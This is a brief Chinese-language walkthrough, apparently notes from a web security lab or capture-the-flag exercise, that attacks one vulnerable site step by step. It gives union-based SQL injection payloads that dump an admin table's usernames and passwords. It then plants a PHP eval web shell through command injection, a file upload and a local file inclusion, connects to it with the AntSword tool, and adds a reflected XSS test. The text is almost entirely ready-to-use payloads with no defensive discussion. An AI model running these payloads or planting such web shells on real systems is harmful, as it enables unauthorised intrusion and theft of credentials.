进入网页
1.sql注入
测回显点
-1 union select 1,2,3#
看数据库
-1 union select 1,2,database()#
看表名
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#
看admin表中列名
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#
看admin的账号和密码
-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#
2.命令执行漏洞
输入ls查看
输入echo '<?php phpinfo();?>' > a.php 访问a.php
写入一句话木马,访问1.php
echo '<?php @eval($_POST['cmd']);?>' > 1.php
使用蚁剑链接
3.文件上传漏洞
使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方
上传一个2.PHP木马文件
访问路径并用蚁剑链接
4.文件包含漏洞
发现关于文件包含
通过访问之前写入的1.php查看,远程文件包含关闭,本地文件可以访问
包含之前的1.php一句话木马,访问
蚁剑链接
5.反射型xss漏洞
在登录界面输入<script>alert(1)</script>